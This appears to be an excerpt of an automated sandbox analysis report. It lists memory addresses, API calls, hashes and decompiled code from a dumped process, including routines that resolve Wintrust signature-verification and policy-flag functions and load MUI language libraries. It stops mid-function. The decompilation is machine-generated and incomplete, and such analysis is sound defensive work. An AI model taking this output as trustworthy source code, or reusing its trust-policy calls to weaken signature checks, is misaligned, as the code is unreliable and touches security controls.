                                                        0x00b913d2
                                                        0x00b913ea
                                                        0x00b913ea
                                                        0x00b913ea
                                                        0x00000000
                                                        0x00b913ea
                                                        0x00b913d4
                                                        0x00b913d6
                                                        0x00b913d8
                                                        0x00b913df
                                                        0x00b913df
                                                        0x00b913df
                                                        0x00b913d8
                                                        0x00b913e4
                                                        0x00b913e6
                                                        0x00b913e8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b913e8
                                                        0x00b913a2
                                                        0x00b913a8
                                                        0x00b913ad
                                                        0x00b913b0
                                                        0x00b913b3
                                                        0x00000000
                                                        0x00000000
                                                        0x00b913b6
                                                        0x00b913b9
                                                        0x00b913bb
                                                        0x00000000
                                                        0x00000000
                                                        0x00b913bd
                                                        0x00000000
                                                        0x00b913bd
                                                        0x00b912d9
                                                        0x00b912d9
                                                        0x00b912e1
                                                        0x00b912e8
                                                        0x00b912e8
                                                        0x00b912ed
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 00B855CA: GetSystemDirectoryA.KERNEL32(?,00000000), ref: 00B855DD
                                                          • Part of subcall function 00B855CA: ??2@YAPAXI@Z.MSVCRT ref: 00B85603
                                                          • Part of subcall function 00B855CA: GetSystemDirectoryA.KERNEL32(00000000,00000001), ref: 00B85616
                                                          • Part of subcall function 00B855CA: LoadLibraryA.KERNEL32(00000000), ref: 00B85645
                                                          • Part of subcall function 00B855CA: ??3@YAXPAX@Z.MSVCRT ref: 00B8565F
                                                        • GetProcAddress.KERNEL32(00B905FC,WinVerifyTrust,wintrust.dll,00B905FC,?,?,00000000), ref: 00B912D0
                                                        • GetLastError.KERNEL32(?,00000000), ref: 00B912D9
                                                        • GetProcAddress.KERNEL32(00B905FC,WintrustGetRegPolicyFlags,?,00000000), ref: 00B912FC
                                                        • GetProcAddress.KERNEL32(00B905FC,WintrustSetRegPolicyFlags,?,00000000), ref: 00B9130D
                                                        • wcsrchr.MSVCRT ref: 00B91324
                                                        • memset.MSVCRT ref: 00B91344
                                                        • CloseHandle.KERNEL32(?), ref: 00B91400
                                                        • FreeLibrary.KERNEL32(00B905FC,wintrust.dll,00B905FC,?,?,00000000), ref: 00B9140E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: AddressProc$DirectoryLibrarySystem$??2@??3@CloseErrorFreeHandleLastLoadmemsetwcsrchr
                                                        • String ID: O$WinVerifyTrust$WintrustGetRegPolicyFlags$WintrustSetRegPolicyFlags$wintrust.dll
                                                        • API String ID: 1938701329-460148589
                                                        • Opcode ID: 8eb45db3afcc27012214807615ae09218715378f74aaecb592eb8c39922db580
                                                        • Instruction ID: fce7829068dcd0aac5e63e7fdabe75f78c7cea7049c6f2e43828a93cdb3ed742
                                                        • Opcode Fuzzy Hash: 8eb45db3afcc27012214807615ae09218715378f74aaecb592eb8c39922db580
                                                        • Instruction Fuzzy Hash: EB511571D0025AABCF10DFE8C8859EEBBF8EF08310F1449BAE511F7290D6748941DBA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B947EF, Relevance: 21.5, APIs: 9, Strings: 3, Instructions: 480libraryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 91%
                                                        			E00B947EF(WCHAR* __edx, void* __edi, WCHAR* _a4, signed int _a8, signed short _a12) {
				signed int _v8;
				char _v180;
				char _v352;
				char _v524;
				short _v1044;
				struct HINSTANCE__* _v1048;
				WCHAR* _v1052;
				signed int _v1056;
				signed int _v1060;
				WCHAR* _v1064;
				WCHAR* _v1068;
				void* __ebx;
				void* __esi;
				signed int _t173;
				signed int _t175;
				signed char _t177;
				signed int _t183;
				signed int _t185;
				signed int _t186;
				signed char _t188;
				signed int _t191;
				struct HINSTANCE__* _t193;
				signed int _t197;
				signed int _t205;
				signed short _t206;
				signed short _t207;
				signed int _t215;
				signed short _t223;
				signed int _t229;
				signed int _t233;
				void* _t234;
				signed int _t238;
				signed int _t240;
				signed int _t247;
				signed int _t250;
				signed int _t254;
				signed int _t257;
				signed int _t261;
				signed int _t273;
				signed short _t276;
				signed short _t284;
				signed int _t293;
				void* _t306;
				signed short _t324;
				WCHAR* _t327;
				WCHAR* _t330;
				WCHAR* _t331;
				signed int _t334;
				void* _t335;

				_t323 = __edi;
				_t322 = __edx;
				_t173 =  *0xb97004; // 0xbb40e64e
				_v8 = _t173 ^ _t334;
				_t333 = _a4;
				_t293 = 0;
				_v1068 = _t333;
				_v1052 = 0;
				if(_t333 != 0) {
					__eflags = _a8 & 0xffffffe3;
					if((_a8 & 0xffffffe3) != 0) {
						goto L1;
					} else {
						_push(__edi);
						_t324 = _a12;
						__eflags = _t324;
						if(_t324 != 0) {
							L5:
							_t177 = E00B9407D();
							 *0xb974d0 = _t177;
							_t175 = LoadLibraryExW(_t333, 0, _t177 & 0x20 | 0x00000002);
							_v1048 = _t175;
							__eflags = _t175;
							if(_t175 == 0) {
								goto L72;
							} else {
								__eflags =  *0xb974d0 & 0x00000020;
								if(( *0xb974d0 & 0x00000020) == 0) {
									_t183 = SearchPathW(0, _t333, 0, 0x104,  &_v1044,  &_v1052);
									__eflags = _t183;
									if(_t183 == 0) {
										L71:
										FreeLibrary(_v1048);
										goto L72;
									} else {
										_t185 = _v1052;
										__eflags = _t185;
										if(_t185 != 0) {
											_v1056 =  &_v1044;
											__eflags = 0;
											 *((short*)(_t185 - 2)) = 0;
										} else {
											_v1056 = _v1056 & _t293;
											_v1052 =  &_v1044;
										}
										_t186 = E00B93F3E(_v1048, 0);
										__eflags = _t186;
										if(_t186 == 0) {
											L69:
											__eflags = _a8 & 0x00000010;
											if((_a8 & 0x00000010) == 0) {
												L77:
												__eflags = _v1048 & 0x00000001;
												if((_v1048 & 0x00000001) != 0) {
													FreeLibrary(_v1048);
													_t188 = E00B9407D();
													__eflags = _t188 & 0x00000038;
													if((_t188 & 0x00000038) == 0) {
														E00B9407D();
														_t191 = 0;
														_t168 = __eflags != 0;
														__eflags = _t168;
														_t193 = LoadLibraryExW(_v1068, 0, _t191 & 0xffffff00 | _t168);
													} else {
														_push(_v1052);
														E00B94653( &_v1044, 0x104, L"%s\\%s", _v1056);
														_t193 = E00B93FF0( &_v1044, 1, 0);
													}
													_v1048 = _t193;
												}
												_t175 = _v1048;
											} else {
												_t197 = E00B93F3E(_v1048, _a12);
												__eflags = _t197;
												if(_t197 != 0) {
													goto L77;
												} else {
													goto L71;
												}
											}
										} else {
											__eflags = _t324;
											if(_t324 != 0) {
												__eflags =  *0xb974d0 & 0x00000007;
												if(( *0xb974d0 & 0x00000007) == 0) {
													goto L69;
												} else {
													__eflags = _a8 & 0x00000008;
													if((_a8 & 0x00000008) == 0) {
														E00B94653( &_v180, 0x55, L"MUI\\%04hx", _t324 & 0x0000ffff);
														_t335 = _t335 + 0x10;
														goto L74;
													} else {
														_t333 =  &_v180;
														_t205 = E00B945B5(0,  &_v180, _t324,  &_v352);
														__eflags = _t205;
														if(_t205 != 0) {
															L74:
															_t322 =  &_v180;
															_t293 = E00B9472C(_v1052, _v1048,  &_v180, _v1056);
															goto L75;
														} else {
															goto L69;
														}
													}
												}
											} else {
												_t206 =  *0xb974d0; // 0x0
												__eflags = _t206 & 0x00000004;
												if((_t206 & 0x00000004) == 0) {
													__eflags = _t206 & 0x00000003;
													if((_t206 & 0x00000003) == 0) {
														goto L69;
													} else {
														_t207 = E00B9422B();
														__eflags = _a8 & 0x00000008;
														_t208 = _t207 & 0x0000ffff;
														_v1064 = _t207 & 0x0000ffff;
														if((_a8 & 0x00000008) == 0) {
															E00B94653( &_v180, 0x55, L"MUI\\%04hx", _t208 & 0x0000ffff);
															_t335 = _t335 + 0x10;
															_t322 =  &_v180;
															_t293 = E00B9472C(_v1052, _v1048,  &_v180, _v1056);
															__eflags = _t293;
															if(_t293 != 0) {
																goto L76;
															} else {
																_t333 =  &_v180;
																_t215 = E00B945B5(0, _t333, _v1064,  &_v352);
																__eflags = _t215;
																if(_t215 == 0) {
																	L60:
																	__eflags = 0x409 - _v1064;
																	goto L61;
																} else {
																	_t223 = E00B9502B( &_v352, 2) & 0x0000ffff;
																	__eflags = _t223;
																	if(_t223 == 0) {
																		goto L60;
																	} else {
																		E00B94653(_t333, 0x55, L"MUI\\%04hx", _t223 & 0x0000ffff);
																		_t335 = _t335 + 0x10;
																		_t322 = _t333;
																		_t293 = E00B9472C(_v1052, _v1048, _t333, _v1056);
																		__eflags = _t293;
																		if(_t293 != 0) {
																			goto L76;
																		} else {
																			goto L60;
																		}
																	}
																}
															}
														} else {
															_t327 =  &_v524;
															_t333 =  &_v180;
															_t229 = E00B945B5(_t327, _t333, _t208,  &_v352);
															__eflags = _t229;
															if(_t229 == 0) {
																goto L69;
															} else {
																_t322 = _t333;
																_t293 = E00B9472C(_v1052, _v1048, _t333, _v1056);
																__eflags = _t293;
																if(_t293 != 0) {
																	goto L76;
																} else {
																	_t322 =  &_v352;
																	_t233 = E00B9472C(_v1052, _v1048,  &_v352, _v1056);
																	_t293 = _t233;
																	__eflags = _t293;
																	if(_t293 != 0) {
																		goto L76;
																	} else {
																		__eflags = _v524 - _t233;
																		if(_v524 == _t233) {
																			L53:
																			_t234 = 0x409;
																			_t306 = 0x409;
																			goto L54;
																		} else {
																			_t322 = _t327;
																			_t293 = E00B9472C(_v1052, _v1048, _t327, _v1056);
																			__eflags = _t293;
																			if(_t293 != 0) {
																				goto L76;
																			} else {
																				goto L53;
																			}
																		}
																	}
																}
															}
														}
													}
												} else {
													__imp__GetUserDefaultUILanguage();
													_t238 = _t206 & 0x0000ffff;
													_v1060 = _t238;
													__eflags = _t238 - 0x404;
													if(_t238 == 0x404) {
														_v1060 = E00B941BC() & 0x0000ffff;
													}
													_t240 = _a8 & 0x00000008;
													__eflags = _t240;
													_v1064 = _t240;
													while(1) {
														__eflags = _v1064;
														if(_v1064 == 0) {
															goto L25;
														}
														_t330 =  &_v524;
														_t333 =  &_v180;
														_t250 = E00B945B5(_t330, _t333, _v1060,  &_v352);
														__eflags = _t250;
														if(_t250 == 0) {
															L75:
															__eflags = _t293;
															if(_t293 == 0) {
																goto L69;
															} else {
																goto L76;
															}
														} else {
															_t322 = _t333;
															_t293 = E00B9472C(_v1052, _v1048, _t333, _v1056);
															__eflags = _t293;
															if(_t293 != 0) {
																L76:
																FreeLibrary(_v1048);
																_t175 = _t293;
															} else {
																_t322 =  &_v352;
																_t254 = E00B9472C(_v1052, _v1048,  &_v352, _v1056);
																_t293 = _t254;
																__eflags = _t293;
																if(_t293 != 0) {
																	goto L76;
																} else {
																	__eflags = _v524 - _t254;
																	if(_v524 == _t254) {
																		L23:
																		__eflags = _v1060 - 0xc04;
																		if(_v1060 != 0xc04) {
																			__imp__GetSystemDefaultUILanguage();
																			_v1064 = 0xc04;
																			__eflags = 0xc04 - _v1060;
																			if(0xc04 == _v1060) {
																				L44:
																				_t234 = 0x409;
																				_t306 = 0x409;
																				__eflags = 0x409 - _v1060;
																				if(0x409 != _v1060) {
																					L54:
																					__eflags = _t306 - _v1064;
																					if(_t306 == _v1064) {
																						goto L64;
																					} else {
																						_t333 =  &_v180;
																						E00B945B5(0, _t333, _t234,  &_v352);
																						_t322 = _t333;
																						L63:
																						_t293 = E00B9472C(_v1052, _v1048, _t322, _v1056);
																						__eflags = _t293;
																						if(_t293 != 0) {
																							goto L76;
																						} else {
																							goto L64;
																						}
																					}
																				} else {
																					L64:
																					_t322 = 0;
																					_t293 = E00B9472C(_v1052, _v1048, 0, _v1056);
																					__eflags = _t293;
																					if(_t293 == 0) {
																						goto L75;
																					} else {
																						goto L76;
																					}
																				}
																			} else {
																				_t331 =  &_v524;
																				_t333 =  &_v180;
																				_t257 = E00B945B5(_t331, _t333, 0xc04,  &_v352);
																				__eflags = _t257;
																				if(_t257 == 0) {
																					goto L69;
																				} else {
																					_t322 = _t333;
																					_t293 = E00B9472C(_v1052, _v1048, _t333, _v1056);
																					__eflags = _t293;
																					if(_t293 != 0) {
																						goto L76;
																					} else {
																						_t322 =  &_v352;
																						_t261 = E00B9472C(_v1052, _v1048,  &_v352, _v1056);
																						_t293 = _t261;
																						__eflags = _t293;
																						if(_t293 != 0) {
																							goto L76;
																						} else {
																							__eflags = _v524 - _t261;
																							if(_v524 == _t261) {
																								goto L44;
																							} else {
																								_t322 = _t331;
																								_t293 = E00B9472C(_v1052, _v1048, _t331, _v1056);
																								__eflags = _t293;
																								if(_t293 != 0) {
																									goto L76;
																								} else {
																									goto L44;
																								}
																							}
																						}
																					}
																				}
																			}
																		} else {
																			L24:
																			_v1060 = 0x404;
																			continue;
																		}
																	} else {
																		_t322 = _t330;
																		_t293 = E00B9472C(_v1052, _v1048, _t330, _v1056);
																		__eflags = _t293;
																		if(_t293 != 0) {
																			goto L76;
																		} else {
																			goto L23;
																		}
																	}
																}
															}
														}
														goto L83;
														L25:
														E00B94653( &_v180, 0x55, L"MUI\\%04hx", _v1060 & 0x0000ffff);
														_t335 = _t335 + 0x10;
														_t322 =  &_v180;
														_t293 = E00B9472C(_v1052, _v1048,  &_v180, _v1056);
														__eflags = _t293;
														if(_t293 != 0) {
															goto L76;
														} else {
															_t333 =  &_v180;
															_t247 = E00B945B5(0, _t333, _v1060,  &_v352);
															__eflags = _t247;
															if(_t247 == 0) {
																L29:
																__eflags = _v1060 - 0xc04;
																if(_v1060 == 0xc04) {
																	goto L24;
																} else {
																	__imp__GetSystemDefaultUILanguage();
																	_t333 = 0xc04;
																	_v1064 = 0xc04;
																	__eflags = 0xc04 - _v1060;
																	if(0xc04 == _v1060) {
																		L36:
																		__eflags = 0x409 - _v1060;
																		if(0x409 == _v1060) {
																			goto L64;
																		} else {
																			__eflags = 0x409 - _t333;
																			L61:
																			if(__eflags == 0) {
																				goto L64;
																			} else {
																				_t322 = L"MUI\\0409";
																				goto L63;
																			}
																		}
																	} else {
																		E00B94653( &_v180, 0x55, L"MUI\\%04hx", 0xc04);
																		_t335 = _t335 + 0x10;
																		_t322 =  &_v180;
																		_t293 = E00B9472C(_v1052, _v1048,  &_v180, _v1056);
																		__eflags = _t293;
																		if(_t293 != 0) {
																			goto L76;
																		} else {
																			_t333 =  &_v180;
																			_t273 = E00B945B5(0, _t333, 0xc04,  &_v352);
																			__eflags = _t273;
																			if(_t273 == 0) {
																				L35:
																				_t333 = _v1064;
																				goto L36;
																			} else {
																				_t276 = E00B9502B( &_v352, 2) & 0x0000ffff;
																				__eflags = _t276;
																				if(_t276 == 0) {
																					goto L35;
																				} else {
																					E00B94653(_t333, 0x55, L"MUI\\%04hx", _t276 & 0x0000ffff);
																					_t335 = _t335 + 0x10;
																					_t322 = _t333;
																					_t293 = E00B9472C(_v1052, _v1048, _t333, _v1056);
																					__eflags = _t293;
																					if(_t293 != 0) {
																						goto L76;
																					} else {
																						goto L35;
																					}
																				}
																			}
																		}
																	}
																}
															} else {
																_t284 = E00B9502B( &_v352, 2) & 0x0000ffff;
																__eflags = _t284;
																if(_t284 == 0) {
																	goto L29;
																} else {
																	E00B94653(_t333, 0x55, L"MUI\\%04hx", _t284 & 0x0000ffff);
																	_t335 = _t335 + 0x10;
																	_t322 = _t333;
																	_t293 = E00B9472C(_v1052, _v1048, _t333, _v1056);
																	__eflags = _t293;
																	if(_t293 != 0) {
																		goto L76;
																	} else {
																		goto L29;
																	}
																}
															}
														}
														goto L83;
													}
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _a8 & 0x00000010;
							if((_a8 & 0x00000010) != 0) {
								L72:
								_t175 = 0;
							} else {
								goto L5;
							}
						}
						L83:
						_pop(_t323);
					}
				} else {
					L1:
					_t175 = 0;
				}
				return E00B81335(_t175, _t293, _v8 ^ _t334, _t322, _t323, _t333);
			}




















































                                                        0x00b947ef
                                                        0x00b947ef
                                                        0x00b947fa
                                                        0x00b94801
                                                        0x00b94806
                                                        0x00b94809
                                                        0x00b9480b
                                                        0x00b94811
                                                        0x00b94819
                                                        0x00b94822
                                                        0x00b94829
                                                        0x00000000
                                                        0x00b9482b
                                                        0x00b9482b
                                                        0x00b9482c
                                                        0x00b9482f
                                                        0x00b94832
                                                        0x00b9483e
                                                        0x00b9483e
                                                        0x00b94843
                                                        0x00b94855
                                                        0x00b9485b
                                                        0x00b94861
                                                        0x00b94863
                                                        0x00000000
                                                        0x00b94869
                                                        0x00b94869
                                                        0x00b94870
                                                        0x00b9488e
                                                        0x00b94894
                                                        0x00b94896
                                                        0x00b94e9c
                                                        0x00b94ea2
                                                        0x00000000
                                                        0x00b9489c
                                                        0x00b9489c
                                                        0x00b948a2
                                                        0x00b948a4
                                                        0x00b948c0
                                                        0x00b948c6
                                                        0x00b948c8
                                                        0x00b948a6
                                                        0x00b948a6
                                                        0x00b948b2
                                                        0x00b948b2
                                                        0x00b948d4
                                                        0x00b948d9
                                                        0x00b948db
                                                        0x00b94e84
                                                        0x00b94e84
                                                        0x00b94e88
                                                        0x00b94efc
                                                        0x00b94efc
                                                        0x00b94f03
                                                        0x00b94f0b
                                                        0x00b94f11
                                                        0x00b94f16
                                                        0x00b94f18
                                                        0x00b94f51
                                                        0x00b94f5b
                                                        0x00b94f5c
                                                        0x00b94f5c
                                                        0x00b94f68
                                                        0x00b94f1a
                                                        0x00b94f1a
                                                        0x00b94f37
                                                        0x00b94f4a
                                                        0x00b94f4a
                                                        0x00b94f6e
                                                        0x00b94f6e
                                                        0x00b94f74
                                                        0x00b94e8a
                                                        0x00b94e93
                                                        0x00b94e98
                                                        0x00b94e9a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b94e9a
                                                        0x00b948e1
                                                        0x00b948e1
                                                        0x00b948e4
                                                        0x00b94e5c
                                                        0x00b94e63
                                                        0x00000000
                                                        0x00b94e65
                                                        0x00b94e65
                                                        0x00b94e69
                                                        0x00b94ec1
                                                        0x00b94ec6
                                                        0x00000000
                                                        0x00b94e6b
                                                        0x00b94e75
                                                        0x00b94e7b
                                                        0x00b94e80
                                                        0x00b94e82
                                                        0x00b94ec9
                                                        0x00b94edb
                                                        0x00b94ee6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b94e82
                                                        0x00b94e69
                                                        0x00b948ea
                                                        0x00b948ea
                                                        0x00b948ef
                                                        0x00b948f1
                                                        0x00b94c6b
                                                        0x00b94c6d
                                                        0x00000000
                                                        0x00b94c73
                                                        0x00b94c73
                                                        0x00b94c78
                                                        0x00b94c7c
                                                        0x00b94c7f
                                                        0x00b94c85
                                                        0x00b94d64
                                                        0x00b94d75
                                                        0x00b94d7e
                                                        0x00b94d89
                                                        0x00b94d8b
                                                        0x00b94d8d
                                                        0x00000000
                                                        0x00b94d93
                                                        0x00b94da2
                                                        0x00b94da8
                                                        0x00b94dad
                                                        0x00b94daf
                                                        0x00b94e00
                                                        0x00b94e05
                                                        0x00000000
                                                        0x00b94db1
                                                        0x00b94dbf
                                                        0x00b94dc2
                                                        0x00b94dc5
                                                        0x00000000
                                                        0x00b94dc7
                                                        0x00b94dd5
                                                        0x00b94de6
                                                        0x00b94def
                                                        0x00b94df6
                                                        0x00b94df8
                                                        0x00b94dfa
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b94dfa
                                                        0x00b94dc5
                                                        0x00b94daf
                                                        0x00b94c8b
                                                        0x00b94c93
                                                        0x00b94c99
                                                        0x00b94c9f
                                                        0x00b94ca4
                                                        0x00b94ca6
                                                        0x00000000
                                                        0x00b94cac
                                                        0x00b94cbe
                                                        0x00b94cc5
                                                        0x00b94cc7
                                                        0x00b94cc9
                                                        0x00000000
                                                        0x00b94ccf
                                                        0x00b94ce1
                                                        0x00b94ce7
                                                        0x00b94cec
                                                        0x00b94cee
                                                        0x00b94cf0
                                                        0x00000000
                                                        0x00b94cf6
                                                        0x00b94cf6
                                                        0x00b94cfd
                                                        0x00b94d22
                                                        0x00b94d22
                                                        0x00b94d27
                                                        0x00000000
                                                        0x00b94cff
                                                        0x00b94d11
                                                        0x00b94d18
                                                        0x00b94d1a
                                                        0x00b94d1c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b94d1c
                                                        0x00b94cfd
                                                        0x00b94cf0
                                                        0x00b94cc9
                                                        0x00b94ca6
                                                        0x00b94c85
                                                        0x00b948f7
                                                        0x00b948f7
                                                        0x00b948fd
                                                        0x00b94905
                                                        0x00b9490b
                                                        0x00b9490e
                                                        0x00b94918
                                                        0x00b94918
                                                        0x00b94921
                                                        0x00b94921
                                                        0x00b94924
                                                        0x00b9492a
                                                        0x00b9492a
                                                        0x00b94931
                                                        0x00000000
                                                        0x00000000
                                                        0x00b94944
                                                        0x00b9494a
                                                        0x00b94950
                                                        0x00b94955
                                                        0x00b94957
                                                        0x00b94ee8
                                                        0x00b94ee8
                                                        0x00b94eea
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9495d
                                                        0x00b9496f
                                                        0x00b94976
                                                        0x00b94978
                                                        0x00b9497a
                                                        0x00b94eec
                                                        0x00b94ef2
                                                        0x00b94ef8
                                                        0x00b94980
                                                        0x00b94992
                                                        0x00b94998
                                                        0x00b9499d
                                                        0x00b9499f
                                                        0x00b949a1
                                                        0x00000000
                                                        0x00b949a7
                                                        0x00b949a7
                                                        0x00b949ae
                                                        0x00b949d3
                                                        0x00b949d8
                                                        0x00b949df
                                                        0x00b94b9f
                                                        0x00b94ba8
                                                        0x00b94bae
                                                        0x00b94bb5
                                                        0x00b94c52
                                                        0x00b94c52
                                                        0x00b94c57
                                                        0x00b94c59
                                                        0x00b94c60
                                                        0x00b94d29
                                                        0x00b94d29
                                                        0x00b94d30
                                                        0x00000000
                                                        0x00b94d36
                                                        0x00b94d40
                                                        0x00b94d46
                                                        0x00b94d4b
                                                        0x00b94e13
                                                        0x00b94e2a
                                                        0x00b94e2c
                                                        0x00b94e2e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b94e2e
                                                        0x00b94c66
                                                        0x00b94e34
                                                        0x00b94e46
                                                        0x00b94e4d
                                                        0x00b94e4f
                                                        0x00b94e51
                                                        0x00000000
                                                        0x00b94e57
                                                        0x00000000
                                                        0x00b94e57
                                                        0x00b94e51
                                                        0x00b94bbb
                                                        0x00b94bc3
                                                        0x00b94bc9
                                                        0x00b94bcf
                                                        0x00b94bd4
                                                        0x00b94bd6
                                                        0x00000000
                                                        0x00b94bdc
                                                        0x00b94bee
                                                        0x00b94bf5
                                                        0x00b94bf7
                                                        0x00b94bf9
                                                        0x00000000
                                                        0x00b94bff
                                                        0x00b94c11
                                                        0x00b94c17
                                                        0x00b94c1c
                                                        0x00b94c1e
                                                        0x00b94c20
                                                        0x00000000
                                                        0x00b94c26
                                                        0x00b94c26
                                                        0x00b94c2d
                                                        0x00000000
                                                        0x00b94c2f
                                                        0x00b94c41
                                                        0x00b94c48
                                                        0x00b94c4a
                                                        0x00b94c4c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b94c4c
                                                        0x00b94c2d
                                                        0x00b94c20
                                                        0x00b94bf9
                                                        0x00b94bd6
                                                        0x00b949e5
                                                        0x00b949e5
                                                        0x00b949e5
                                                        0x00000000
                                                        0x00b949e5
                                                        0x00b949b0
                                                        0x00b949c2
                                                        0x00b949c9
                                                        0x00b949cb
                                                        0x00b949cd
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b949cd
                                                        0x00b949ae
                                                        0x00b949a1
                                                        0x00b9497a
                                                        0x00000000
                                                        0x00b949f4
                                                        0x00b94a0a
                                                        0x00b94a1b
                                                        0x00b94a24
                                                        0x00b94a2f
                                                        0x00b94a31
                                                        0x00b94a33
                                                        0x00000000
                                                        0x00b94a39
                                                        0x00b94a48
                                                        0x00b94a4e
                                                        0x00b94a53
                                                        0x00b94a55
                                                        0x00b94aa6
                                                        0x00b94aab
                                                        0x00b94ab2
                                                        0x00000000
                                                        0x00b94ab8
                                                        0x00b94ab8
                                                        0x00b94abe
                                                        0x00b94ac1
                                                        0x00b94ac7
                                                        0x00b94ace
                                                        0x00b94b83
                                                        0x00b94b8a
                                                        0x00b94b91
                                                        0x00000000
                                                        0x00b94b97
                                                        0x00b94b97
                                                        0x00b94e0c
                                                        0x00b94e0c
                                                        0x00000000
                                                        0x00b94e0e
                                                        0x00b94e0e
                                                        0x00000000
                                                        0x00b94e0e
                                                        0x00b94e0c
                                                        0x00b94ad4
                                                        0x00b94ae6
                                                        0x00b94af7
                                                        0x00b94b00
                                                        0x00b94b0b
                                                        0x00b94b0d
                                                        0x00b94b0f
                                                        0x00000000
                                                        0x00b94b15
                                                        0x00b94b1f
                                                        0x00b94b25
                                                        0x00b94b2a
                                                        0x00b94b2c
                                                        0x00b94b7d
                                                        0x00b94b7d
                                                        0x00000000
                                                        0x00b94b2e
                                                        0x00b94b3c
                                                        0x00b94b3f
                                                        0x00b94b42
                                                        0x00000000
                                                        0x00b94b44
                                                        0x00b94b52
                                                        0x00b94b63
                                                        0x00b94b6c
                                                        0x00b94b73
                                                        0x00b94b75
                                                        0x00b94b77
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b94b77
                                                        0x00b94b42
                                                        0x00b94b2c
                                                        0x00b94b0f
                                                        0x00b94ace
                                                        0x00b94a57
                                                        0x00b94a65
                                                        0x00b94a68
                                                        0x00b94a6b
                                                        0x00000000
                                                        0x00b94a6d
                                                        0x00b94a7b
                                                        0x00b94a8c
                                                        0x00b94a95
                                                        0x00b94a9c
                                                        0x00b94a9e
                                                        0x00b94aa0
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b94aa0
                                                        0x00b94a6b
                                                        0x00b94a55
                                                        0x00000000
                                                        0x00b94a33
                                                        0x00b9492a
                                                        0x00b948f1
                                                        0x00b948e4
                                                        0x00b948db
                                                        0x00b94896
                                                        0x00b94870
                                                        0x00b94834
                                                        0x00b94834
                                                        0x00b94838
                                                        0x00b94ea8
                                                        0x00b94ea8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b94838
                                                        0x00b94f7a
                                                        0x00b94f7a
                                                        0x00b94f7a
                                                        0x00b9481b
                                                        0x00b9481b
                                                        0x00b9481b
                                                        0x00b9481b
                                                        0x00b94f88

                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(00000008,00000000,?,00000000,00000000,00000000), ref: 00B94855
                                                        • SearchPathW.KERNEL32 ref: 00B9488E
                                                        • GetUserDefaultUILanguage.KERNEL32(?,00000000), ref: 00B948F7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: DefaultLanguageLibraryLoadPathSearchUser
                                                        • String ID: %s\%s$MUI\%04hx$MUI\0409
                                                        • API String ID: 3447616162-4119042291
                                                        • Opcode ID: 35f2ac30a89580ae2556583faf974e9b612321021f84328ff7e95bb4d263afe6
                                                        • Instruction ID: 521f8fe43b60bf448fbc539a4ea12c6d87116d2fff46461075a2c6d1e77bb79f
                                                        • Opcode Fuzzy Hash: 35f2ac30a89580ae2556583faf974e9b612321021f84328ff7e95bb4d263afe6
                                                        • Instruction Fuzzy Hash: 5D1244B4A0062D9BDF249B64CC55FEA77F9EB44304F4080F5AA08A7251DB709EC6CF69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B90068, Relevance: 19.8, APIs: 13, Instructions: 254COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 48%
                                                        			E00B90068(signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				WCHAR* _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				signed int _v20;
				signed int _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				intOrPtr* _t103;
				signed int _t105;
				int _t112;
				int _t113;
				intOrPtr* _t118;
				signed int _t122;
				signed int _t123;
				signed int _t130;
				signed int _t132;
				signed int _t133;
				signed int _t138;
				void* _t144;
				intOrPtr* _t147;
				intOrPtr _t153;
				signed int _t155;
				void* _t162;
				signed int _t176;
				signed int _t178;
				signed int _t182;
				signed int _t187;
				signed int* _t189;
				intOrPtr* _t190;
				void* _t191;
				short _t192;
				void* _t193;
				void* _t194;

				_push(4);
				asm("repe cmpsd");
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				if(0 == 0) {
					_t189 = _a4;
					_t103 =  *((intOrPtr*)(_t189 + 0xc));
					_t182 =  *((intOrPtr*)( *_t103 + 0x1c))(_t103, _a8,  &_v8, 1,  &_v20);
					__eflags = _t182;
					if(_t182 < 0) {
						L26:
						_t144 = 0;
						__eflags = _v36;
						if(_v36 == 0) {
							L30:
							__eflags = _v32;
							if(_v32 != 0) {
								_push(_v32);
								L00B82082();
							}
							_t190 = __imp__#6;
							__eflags = _v8;
							if(_v8 != 0) {
								 *_t190(_v8);
							}
							__eflags = _v12;
							if(_v12 != 0) {
								 *_t190(_v12);
							}
							_t105 = _v16;
							__eflags = _t105;
							if(_t105 != 0) {
								 *((intOrPtr*)( *_t105 + 8))(_t105);
							}
							goto L38;
						}
						_t191 = 0;
						__eflags = _v28;
						if(_v28 <= 0) {
							L29:
